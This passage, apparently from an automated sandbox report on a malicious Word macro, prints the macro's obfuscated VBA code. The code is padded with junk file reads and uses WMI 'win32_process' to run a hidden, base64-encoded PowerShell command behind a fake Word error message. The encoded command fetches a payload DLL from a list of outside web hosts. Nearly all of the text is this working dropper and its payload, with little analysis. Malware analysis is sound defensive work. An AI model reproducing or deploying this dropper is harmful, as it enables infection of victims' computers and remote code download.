]b2[sQA]b2[sLg]b2[sBz]b2[sAG]b2[sUA]b2[sUg]b2[sAn]b2[sAC]b2[skA]b2[sIA]b2[sAg]b2[sAD]b2[ssA]b2[sIA]b2[sAg]b2[sAC]b2[sQA]b2[sRQ]b2[sBy]b2[sAH]b2[sIA]b2[sbw]b2[sBy]b2[sAE]b2[sEA]b2[sYw]b2[sB0]b2[sAG]b2[skA]b2[sbw]b2[sBu]b2[sAF]b2[sAA]b2[scg]b2[sBl]b2[sAG]b2[sYA]b2[sZQ]b2[sBy]b2[sAG]b2[sUA]b2[sbg]b2[sBj]b2[sAG]b2[sUA]b2[sIA]b2[sA9]b2[sAC]b2[sAA]b2[sKA]b2[sAn]b2[sAF]b2[sMA]b2[saQ]b2[sAn]b2[sAC]b2[ssA]b2[sKA]b2[sAn]b2[sAG]b2[swA]b2[sZQ]b2[sAn]b2[sAC]b2[ssA]b2[sJw]b2[sBu]b2[sAC]b2[scA]b2[sKQ]b2[sAr]b2[sAC]b2[scA]b2[sdA]b2[sAn]b2[sAC]b2[ssA]b2[sKA]b2[sAn]b2[sAG]b2[swA]b2[seQ]b2[sAn]b2[sAC]b2[ssA]b2[sJw]b2[sBD]b2[sAC]b2[scA]b2[sKQ]b2[sAr]b2[sAC]b2[sgA]b2[sJw]b2[sBv]b2[sAG]b2[s4A]b2[sdA]b2[sBp]b2[sAC]b2[scA]b2[sKw]b2[sAn]b2[sAG]b2[s4A]b2[sJw]b2[sAr]b2[sAC]b2[scA]b2[sdQ]b2[sBl]b2[sAC]b2[scA]b2[sKQ]b2[sAp]b2[sAD]b2[ssA]b2[sJA]b2[sBZ]b2[sAH]b2[sQA]b2[sZA]b2[sBf]b2[sAH]b2[sAA]b2[scA]b2[sBi]b2[sAD]b2[s0A]b2[sJA]b2[sBI]b2[sAD]b2[sQA]b2[sXw]b2[sBM]b2[sAC]b2[sAA]b2[sKw]b2[sAg]b2[sAF]b2[ssA]b2[sYw]b2[sBo]b2[sAG]b2[sEA]b2[scg]b2[sBd]b2[sAC]b2[sgA]b2[sNg]b2[sA0]b2[sAC]b2[skA]b2[sIA]b2[sAr]b2[sAC]b2[sAA]b2[sJA]b2[sBR]b2[sAD]b2[sAA]b2[sMQ]b2[sBR]b2[sAD]b2[ssA]b2[sJA]b2[sBF]b2[sAD]b2[sEA]b2[sNQ]b2[sBO]b2[sAD]b2[s0A]b2[sKA]b2[sAo]b2[sAC]b2[scA]b2[sTw]b2[sAn]b2[sAC]b2[ssA]b2[sJw]b2[sAx]b2[sAF]b2[s8A]b2[sJw]b2[sAp]b2[sAC]b2[ssA]b2[sJw]b2[sBW]b2[sAC]b2[scA]b2[sKQ]b2[sA7]b2[sAC]b2[sAA]b2[sIA]b2[sAo]b2[sAC]b2[sAA]b2[sZw]b2[sBl]b2[sAF]b2[sQA]b2[sLQ]b2[sBW]b2[sAG]b2[sEA]b2[sUg]b2[sBp]b2[sAG]b2[sEA]b2[sYg]b2[sBs]b2[sAG]b2[sUA]b2[sIA]b2[sB1]b2[sAD]b2[sYA]b2[sMw]b2[sA1]b2[sAD]b2[sEA]b2[sIA]b2[sAt]b2[sAF]b2[sYA]b2) -> 19213

                                              FreeFile

                                              Open

                                              Open

                                              LOF

                                              intGend

                                              FreeFile

                                              Open

                                              Open

                                              LOF

                                              intGend

                                              Create

                                              SWbemObjectEx.Create("cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAKwAnAG0AJwApACsAJwBwACcAKwAoACcAdQB0ACcAKwAnAGUAJwApACsAJwByAC4AJwArACgAJwBjAG8AbQAvAGMAJwArACcAbwBuACcAKQArACgAJwB0AGUAbgAnACsAJwB0AC8AVAAnACkAKwAoACcATAAvAEAAXQAnACsAJwBiACcAKwAnADIAWwBzACcAKwAnAHMAJwApACsAKAAnADoAJwArACcALwAvACcAKQArACcAZAAtACcAKwAoACcAYwAnACsAJwBlAG0AJwArACcALgBjAG8AbQAnACkAKwAnAC8AJwArACcAdwBwACcAKwAoACcALQBhACcAKwAnAGQAJwApACsAKAAnAG0AJwArACcAaQBuACcAKQArACcALwAnACsAKAAnAEoAJwArACcAUwBMAHcARwAxACcAKQArACgAJwAvAEAAXQBiADIAWwBzACcAKwAnADoAJwArACcALwAnACkAKwAnAC8AJwArACgAJwB0AGgAZQBiAGUAcwAnACsAJwB0ACcAKQArACcAZgAnACsAKAAnAGkAawByAGEAJwArACcAaAAuACcAKwAnAGMAbwAnACkAKwAnAG0AJwArACgAJwAvAHcAcAAtACcAKwAnAGEAZABtACcAKwAnAGkAJwArACcAbgAvACcAKQArACgAJwBmACcAKwAnAE8ASQBsACcAKwAnAFYAWAAvAEAAJwApACsAKAAnAF0AYgAyACcAKwAnAFsAJwApACsAKAAnAHMAcwA6AC8AJwArACcALwAnACkAKwAoACcAcABoACcAKwAnAGEAdwAnACkAKwAoACcAYQB5AGEAJwArACcAZwBlACcAKQArACcAbgAnACsAKAAnAGMAeQAnACsAJwAuAGMAbwBtAC8AJwApACsAJwB3ACcAKwAnAHAAJwArACgAJwAtACcAKwAnAGEAZAAnACkAKwAnAG0AaQAnACsAJwBuACcAKwAoACcALwAnACsAJwBtAFgAbwAnACkAKwAnADQAYgAnACsAJwAvACcAKQAuACIAcgBlAHAAYABMAGAAQQB,,) -> 0

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: FreeFile

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: LOF

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: intGend

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: FreeFile

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: LOF

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: intGend

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: FreeFile

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: LOF

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: intGend

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: FreeFile

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: Open

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: LOF

                                              Part of subcall function Tfizx5uxnfjbxnml@Jwq9b1lb0hmm7: intGend

                                              Il6ap8xlb73

                                              C1lvz_08ro0vrbmv6

                                              FreeFile

                                              Open

                                              Open

                                              LOF

                                              intGend

                                              FreeFile

                                              Open

                                              Open

                                              LOF

                                              intGend

                                              StringsDecrypted Strings
                                              "F:\VqVSEFdE\MWGOECeCF\PfclaI.OeGfCLIU"
                                              "O:\WQqDe\KszDkOWIC\ttjarADJ.HmKSFGCfE"
                                              "]b2[sp]b2[s"
                                              "]b2[sro]b2[s]b2[sce]b2[ss]b2[ss]b2[s]b2[s"
                                              "F:\jfmsCJLQ\OVuohC\iqVBCCBoF.pAzGmA"
                                              "O:\ZrqrOBE\FXQPgFGG\sXMnHEFDC.KjybCdXDB"
                                              "]b2[s:w]b2[s]b2[sin]b2[s3]b2[s2]b2[s_]b2[s"
                                              "F:\wNSIF\NalQICj\SnhzIBQCA.WlbcmBJ"
                                              "O:\NSaqADG\xcZtJId\QXNwGFN.KtgHGEA"
                                              "w]b2[sin]b2[sm]b2[sgm]b2[st]b2[s]b2[s"
                                              "F:\DMRGvDLCX\DXrWE\kOeDmD.yjIGHMCl"
                                              "O:\zwfmA\FZQAOA\MnHvGI.RIeDASf"
                                              "]b2[ss]b2[s"
                                              "F:\AKQUADx\HTvZJNG\ezFFDE.dCWKQ"
                                              "O:\wYEmvKo\npTgDE\QjFhGJ.dWmjGFD"
                                              "F:\ySkIB\qKFmg\KrORs.CZcSEH"
                                              "O:\rrOzBX\vKCgAGJu\YNZlI.zUSFWsZF"
                                              "F:\EiaVDDCIE\RgrHGIHJ\YsPmFt.nHOaP"
                                              "O:\YNLYhp\IlEWOXUB\zsUqqD.dEGfRCFGF"
                                              "F:\WVuZGJAu\ksDKBbCz\XkJlEj.CrnAcG"
                                              "O:\BNSoFH\dvEzG\mUAiwC.yubtGH"
                                              "F:\LFwuAJBD\MeKNHEh\XqeRErUC.bMHKAFLIh"
                                              "O:\GVNBCFD\RBPGB\hCZaAY.voqXFB"
                                              "F:\mWSwpXAkG\PTfrgAdE\ddNtJFJ.OGZBEnFW"
                                              "O:\MRWMgFJ\zsKRHI\OiSxC.XZZmtH"
                                              "F:\CmMyA\WnqICJj\RxyolAqJ.nRDeH"
                                              "O:\bIYmeeW\uNvuErAyD\EIuXFu.FZTwFCBPD"
                                              "F:\ttHCHFDz\vMPdJC\ZVyvz.VjTkH"
                                              "O:\BccaMZ\jTkNfIWH\wtXBIkAZ.sSCvDComF"
                                              LineInstructionMeta Information
                                              2

                                              Function Nr8et74sjtle6s()

                                              3

                                              On Error Resume Next

                                              executed
                                              4

                                              mKbjhqs = Ouz_y28f7ehnqn.StoryRanges.Item(244 / 244)

                                              Item

                                              5

                                              Goto ywWmAGeG

                                              6

                                              Dim VORRAG() as Byte

                                              7

                                              Dim DfnXDeC as Integer

                                              8

                                              DfnXDeC = FreeFile

                                              FreeFile

                                              9

                                              Open "F:\VqVSEFdE\MWGOECeCF\PfclaI.OeGfCLIU" For Binary Access Read As # DfnXDeC

                                              Open

                                              10

                                              Open "O:\WQqDe\KszDkOWIC\ttjarADJ.HmKSFGCfE" For Binary Access Read As # DfnXDeC

                                              Open

                                              11

                                              Redim VORRAG(1 To LOF(intGend) - 5)

                                              LOF

                                              intGend

                                              12

                                              Get # DfnXDeC, , VORRAG

                                              13

                                              Get # DfnXDeC, , VORRAG

                                              14

                                              Get # DfnXDeC, , VORRAG

                                              15

                                              Close # DfnXDeC

                                              15

                                              ywWmAGeG:

                                              17

                                              snahbsd = "]b2[sp]b2[s"

                                              18

                                              Umvc8xcohh1q3zu0kx = "]b2[sro]b2[s]b2[sce]b2[ss]b2[ss]b2[s]b2[s"

                                              19

                                              Goto gNNhpjuZF

                                              20

                                              Dim JeDBhB() as Byte

                                              21

                                              Dim efPVC as Integer

                                              22

                                              efPVC = FreeFile

                                              FreeFile

                                              23

                                              Open "F:\jfmsCJLQ\OVuohC\iqVBCCBoF.pAzGmA" For Binary Access Read As # efPVC

                                              Open

                                              24

                                              Open "O:\ZrqrOBE\FXQPgFGG\sXMnHEFDC.KjybCdXDB" For Binary Access Read As # efPVC

                                              Open

                                              25

                                              Redim JeDBhB(1 To LOF(intGend) - 5)

                                              LOF

                                              intGend

                                              26

                                              Get # efPVC, , JeDBhB

                                              27

                                              Get # efPVC, , JeDBhB

                                              28

                                              Get # efPVC, , JeDBhB

                                              29

                                              Close # efPVC

                                              29

                                              gNNhpjuZF:

                                              31

                                              Ay7bggewedd3phn5 = "]b2[s:w]b2[s]b2[sin]b2[s3]b2[s2]b2[s_]b2[s"

                                              32

                                              Goto ZCRUUEr

                                              33

                                              Dim COxEbv() as Byte

                                              34

                                              Dim pIXfAL as Integer

                                              35

                                              pIXfAL = FreeFile

                                              FreeFile

                                              36

                                              Open "F:\wNSIF\NalQICj\SnhzIBQCA.WlbcmBJ" For Binary Access Read As # pIXfAL

                                              Open

                                              37

                                              Open "O:\NSaqADG\xcZtJId\QXNwGFN.KtgHGEA" For Binary Access Read As # pIXfAL

                                              Open

                                              38

                                              Redim COxEbv(1 To LOF(intGend) - 5)

                                              LOF

                                              intGend

                                              39

                                              Get # pIXfAL, , COxEbv

                                              40

                                              Get # pIXfAL, , COxEbv

                                              41

                                              Get # pIXfAL, , COxEbv

                                              42

                                              Close # pIXfAL

                                              42

                                              ZCRUUEr:

                                              44

                                              Imytpzb0s5n = "w]b2[sin]b2[sm]b2[sgm]b2[st]b2[s]b2[s"

                                              45

                                              Goto XNcuAGoGD

                                              46

                                              Dim NFVBCEf() as Byte

                                              47

                                              Dim MoyUg as Integer

                                              48

                                              MoyUg = FreeFile

                                              FreeFile

                                              49

                                              Open "F:\DMRGvDLCX\DXrWE\kOeDmD.yjIGHMCl" For Binary Access Read As # MoyUg

                                              Open

                                              50

                                              Open "O:\zwfmA\FZQAOA\MnHvGI.RIeDASf" For Binary Access Read As # MoyUg

                                              Open

                                              51

                                              Redim NFVBCEf(1 To LOF(intGend) - 5)

                                              LOF

                                              intGend

                                              52

                                              Get # MoyUg, , NFVBCEf

                                              53

                                              Get # MoyUg, , NFVBCEf

                                              54

                                              Get # MoyUg, , NFVBCEf

                                              55

                                              Close # MoyUg

                                              55

                                              XNcuAGoGD:

                                              57

                                              B5vh4w9yggemggw4dw = "]b2[ss]b2[s"

                                              58

                                              Goto AeWeHOJCg

                                              59

                                              Dim kBZBQ() as Byte

                                              60

                                              Dim dNGEjAD as Integer

                                              61

                                              dNGEjAD = FreeFile

                                              FreeFile

                                              62

                                              Open "F:\AKQUADx\HTvZJNG\ezFFDE.dCWKQ" For Binary Access Read As # dNGEjAD

                                              Open

                                              63

                                              Open "O:\wYEmvKo\npTgDE\QjFhGJ.dWmjGFD" For Binary Access Read As # dNGEjAD

                                              Open

                                              64

                                              Redim kBZBQ(1 To LOF(intGend) - 5)

                                              LOF

                                              intGend

                                              65

                                              Get # dNGEjAD, , kBZBQ

                                              66

                                              Get # dNGEjAD, , kBZBQ

                                              67

                                              Get # dNGEjAD, , kBZBQ

                                              68

                                              Close # dNGEjAD

                                              68

                                              AeWeHOJCg:

                                              70

                                              U5bklmbs296g6nu09w = Imytpzb0s5n + B5vh4w9yggemggw4dw + Ay7bggewedd3phn5 + snahbsd + Umvc8xcohh1q3zu0kx

                                              71

                                              Goto GbSOBaBqc

                                              72

                                              Dim HQLYP() as Byte

                                              73

                                              Dim vjURJ as Integer

                                              74

                                              vjURJ = FreeFile

                                              FreeFile

                                              75

                                              Open "F:\ySkIB\qKFmg\KrORs.CZcSEH" For Binary Access Read As # vjURJ

                                              Open

                                              76

                                              Open "O:\rrOzBX\vKCgAGJu\YNZlI.zUSFWsZF" For Binary Access Read As # vjURJ

                                              Open

                                              77

                                              Redim HQLYP(1 To LOF(intGend) - 5)

                                              LOF

                                              intGend

                                              78

                                              Get # vjURJ, , HQLYP

                                              79

                                              Get # vjURJ, , HQLYP

                                              80

                                              Get # vjURJ, , HQLYP

                                              81

                                              Close # vjURJ

                                              81

                                              GbSOBaBqc:

                                              83

                                              Jf4lj98w22pm0 = Tfizx5uxnfjbxnml(U5bklmbs296g6nu09w)

                                              84

                                              Goto ykcixJTsM

                                              85

                                              Dim DnGiABxzG() as Byte

                                              86

                                              Dim pGKDuEB as Integer

                                              87

                                              pGKDuEB = FreeFile

                                              FreeFile

                                              88

                                              Open "F:\EiaVDDCIE\RgrHGIHJ\YsPmFt.nHOaP" For Binary Access Read As # pGKDuEB

                                              Open

                                              89

                                              Open "O:\YNLYhp\IlEWOXUB\zsUqqD.dEGfRCFGF" For Binary Access Read As # pGKDuEB

                                              Open

                                              90

                                              Redim DnGiABxzG(1 To LOF(intGend) - 5)

                                              LOF

                                              intGend

                                              91

                                              Get # pGKDuEB, , DnGiABxzG

                                              92

                                              Get # pGKDuEB, , DnGiABxzG

                                              93

                                              Get # pGKDuEB, , DnGiABxzG

                                              94

                                              Close # pGKDuEB

                                              94

                                              ykcixJTsM:

                                              96

                                              Set Wvxrpert99ob1x = CreateObject(Jf4lj98w22pm0)

                                              CreateObject("winmgmts:win32_process")

                                              executed
                                              97

                                              Goto uUxhxDE

                                              98

                                              Dim AUrNIzEG() as Byte

                                              99

                                              Dim lkVoRJ as Integer

                                              100

                                              lkVoRJ = FreeFile

                                              FreeFile

                                              101

                                              Open "F:\WVuZGJAu\ksDKBbCz\XkJlEj.CrnAcG" For Binary Access Read As # lkVoRJ

                                              Open

                                              102

                                              Open "O:\BNSoFH\dvEzG\mUAiwC.yubtGH" For Binary Access Read As # lkVoRJ

                                              Open

                                              103

                                              Redim AUrNIzEG(1 To LOF(intGend) - 5)

                                              LOF

                                              intGend

                                              104

                                              Get # lkVoRJ, , AUrNIzEG

                                              105

                                              Get # lkVoRJ, , AUrNIzEG

                                              106

                                              Get # lkVoRJ, , AUrNIzEG

                                              107

                                              Close # lkVoRJ

                                              107

                                              uUxhxDE:

                                              109

                                              Ysqw359hi8dilh_ = Mid(mKbjhqs, (2 + 3), Len(mKbjhqs))

                                              Mid

                                              Len("\x01 ]b2[s]b2[sc]b2[sm]b2[sd]b2[s ]b2[sc]b2[sm]b2[sd]b2[s ]b2[sc]b2[sm]b2[sd]b2[s ]b2[sc]b2[sm]b2[sd]b2[s ]b2[s/]b2[sc]b2[s ]b2[sm]b2[ss]b2[sg]b2[s ]b2[s%]b2[su]b2[ss]b2[se]b2[sr]b2[sn]b2[sa]b2[sm]b2[se]b2[s%]b2[s ]b2[s/]b2[sv]b2[s ]b2[sW]b2[so]b2[sr]b2[sd]b2[s ]b2[se]b2[sx]b2[sp]b2[se]b2[sr]b2[si]b2[se]b2[sn]b2[sc]b2[se]b2[sd]b2[s ]b2[sa]b2[sn]b2[s ]b2[se]b2[sr]b2[sr]b2[so]b2[sr]b2[s ]b2[st]b2[sr]b2[sy]b2[si]b2[sn]b2[sg]b2[s ]b2[st]b2[so]b2[s ]b2[so]b2[sp]b2[se]b2[sn]b2[s ]b2[st]b2[sh]b2[se]b2[s ]b2[sf]b2[si]b2[sl]b2[se]b2[s.]b2[s ]b2[s&]b2[s ]b2[s ]b2[sP]b2[s^]b2[sO]b2[sw]b2[s^]b2[se]b2[sr]b2[s^]b2[ss]b2[sh]b2[se]b2[s^]b2[sL]b2[s^]b2[sL]b2[s ]b2[s-]b2[sw]b2[s ]b2[sh]b2[si]b2[sd]b2[sd]b2[se]b2[sn]b2[s ]b2[s-]b2[sE]b2[sN]b2[sC]b2[sO]b2[sD]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s IA]b2[sAg]b2[sAC]b2[sQA]b2[sVQ]b2[sA2]b2[sAD]b2[sMA]b2[sNQ]b2[sAx]b2[sAD]b2[s0A]b2[sWw]b2[sBU]b2[sAF]b2[skA]b2[scA]b2[sBF]b2[sAF]b2[s0A]b2[sKA]b2[sAi]b2[sAH]b2[ssA]b2[sMg]b2[sB9]b2[sAH]b2[ssA]b2[sMA]b2[sB9]b2[sAH]b2[ssA]b2[sMQ]b2[sB9]b2[sAH]b2[ssA]b2[sNA]b2[sB9]b2[sAH]b2[ssA]b2[sMw]b2[sB9]b2[sAH]b2[ssA]b2[sNQ]b2[sB9]b2[sAC]b2[sIA]b2[sIA]b2[sAt]b2[sAE]b2[sYA]b2[sIA]b2[sAn]b2[sAH]b2[skA]b2[sUw]b2[sBU]b2[sAE]b2[sUA]b2[sbQ]b2[sAu]b2[sAG]b2[skA]b2[sJw]b2[sAs]b2[sAC]b2[scA]b2[sTw]b2[sAu]b2[sAG]b2[sQA]b2[saQ]b2[sAn]b2[sAC]b2[swA]b2[sJw]b2[sBz]b2[sAC]b2[scA]b2[sLA]b2[sAn]b2[sAE]b2[sUA]b2[sYw]b2[sBU]b2[sAE]b2[s8A]b2[sJw]b2[sAs]b2[sAC]b2[scA]b2[sUg]b2[sAn]b2[sAC]b2[swA]b2[sJw]b2[sBS]b2[sAF]b2[skA]b2[sJw]b2[sAp]b2[sAC]b2[sAA]b2[sIA]b2[sA7]b2[sAC]b2[sQA]b2[sTw]b2[sBM]b2[sAF]b2[sYA]b2[sIA]b2[sA9]b2[sAC]b2[sAA]b2[sWw]b2[sB0]b2[sAF]b2[skA]b2[scA]b2[sBl]b2[sAF]b2[s0A]b2[sKA]b2[sAi]b2[sAH]b2[ssA]b2[sMA]b2[sB9]b2[sAH]b2[ssA]b2[sNw]b2[sB9]b2[sAH]b2[ssA]b2[sMQ]b2[sB9]b2[sAH]b2[ssA]b2[sOA]b2[sB9]b2[sAH]b2[ssA]b2[sMw]b2[sB9]b2[sAH]b2[ssA]b2[sNg]b2[sB9]b2[sAH]b2[ssA]b2[sNQ]b2[sB9]b2[sAH]b2[ssA]b2[sMg]b2[sB9]b2[sAH]b2[ssA]b2[sNA]b2[sB9]b2[sAC]b2[sIA]b2[sIA]b2[sAt]b2[sAE]b2[sYA]b2[sJw]b2[sBz]b2[sAF]b2[skA]b2[sJw]b2[sAs]b2[sAC]b2[scA]b2[sVA]b2[sBF]b2[sAG]b2[s0A]b2[sLg]b2[sBO]b2[sAE]b2[sUA]b2[sJw]b2[sAs]b2[sAC]b2[scA]b2[sbg]b2[sB0]b2[sAG]b2[s0A]b2[sQQ]b2[sBO]b2[sAC]b2[scA]b2[sLA]b2[sAn]b2[sAH]b2[sYA]b2[sJw]b2[sAs]b2[sAC]b2[scA]b2[sQQ]b2[sBH]b2[sAG]b2[sUA]b2[sUg]b2[sAn]b2[sAC]b2[swA]b2[sJw]b2[sBJ]b2[sAC]b2[scA]b2[sLA]b2[sAn]b2[sAG]b2[skA]b2[sQw]b2[sBl]b2[sAF]b2[sAA]b2[sTw]b2[sAn]b2[sAC]b2[swA]b2[sJw]b2[sBz]b2[sAC]b2[scA]b2[sLA]b2[sAn]b2[sAF]b2[sQA]b2[sLg]b2[sBz]b2[sAG]b2[sUA]b2[sUg]b2[sAn]b2[sAC]b2[skA]b2[sIA]b2[sAg]b2[sAD]b2[ssA]b2[sIA]b2[sAg]b2[sAC]b2[sQA]b2[sRQ]b2[sBy]b2[sAH]b2[sIA]b2[sbw]b2[sBy]b2[sAE]b2[sEA]b2[sYw]b2[sB0]b2[sAG]b2[skA]b2[sbw]b2[sBu]b2[sAF]b2[sAA]b2[scg]b2[sBl]b2[sAG]b2[sYA]b2[sZQ]b2[sBy]b2[sAG]b2[sUA]b2[sbg]b2[sBj]b2[sAG]b2[sUA]b2[sIA]b2[sA9]b2[sAC]b2[sAA]b2[sKA]b2[sAn]b2[sAF]b2[sMA]b2[saQ]b2[sAn]b2[sAC]b2[ssA]b2[sKA]b2[sAn]b2[sAG]b2[swA]b2[sZQ]b2[sAn]b2[sAC]b2[ssA]b2[sJw]b2[sBu]b2[sAC]b2[scA]b2[sKQ]b2[sAr]b2[sAC]b2[scA]b2[sdA]b2[sAn]b2[sAC]b2[ssA]b2[sKA]b2[sAn]b2[sAG]b2[swA]b2[seQ]b2[sAn]b2[sAC]b2[ssA]b2[sJw]b2[sBD]b2[sAC]b2[scA]b2[sKQ]b2[sAr]b2[sAC]b2[sgA]b2[sJw]b2[sBv]b2[sAG]b2[s4A]b2[sdA]b2[sBp]b2[sAC]b2[scA]b2[sKw]b2[sAn]b2[sAG]b2[s4A]b2[sJw]b2[sAr]b2[sAC]b2[scA]b2[sdQ]b2[sBl]b2[sAC]b2[scA]b2[sKQ]b2[sAp]b2[sAD]b2[ssA]b2[sJA]b2[sBZ]b2[sAH]b2[sQA]b2[sZA]b2[sBf]b2[sAH]b2[sAA]b2[scA]b2[sBi]b2[sAD]b2[s0A]b2[sJA]b2[sBI]b2[sAD]b2[sQA]b2[sXw]b2[sBM]b2[sAC]b2[sAA]b2[sKw]b2[sAg]b2[sAF]b2[ssA]b2[sYw]b2[sBo]b2[sAG]b2[sEA]b2[scg]b2[sBd]b2[sAC]b2[sgA]b2[sNg]b2[sA0]b2[sAC]b2[skA]b2[sIA]b2[sAr]b2[sAC]b2[sAA]b2[sJA]b2[sBR]b2[sAD]b2[sAA]b2[sMQ]b2[sBR]b2[sAD]b2[ssA]b2[sJA]b2[sBF]b2[sAD]b2[sEA]b2[sNQ]b2[sBO]b2[sAD]b2[s0A]b2[sKA]b2[sAo]b2[sAC]b2[scA]b2[sTw]b2[sAn]b2[sAC]b2[ssA]b2[sJw]b2[sAx]b2[sAF]b2[s8A]b2[sJw]b2[sAp]b2[s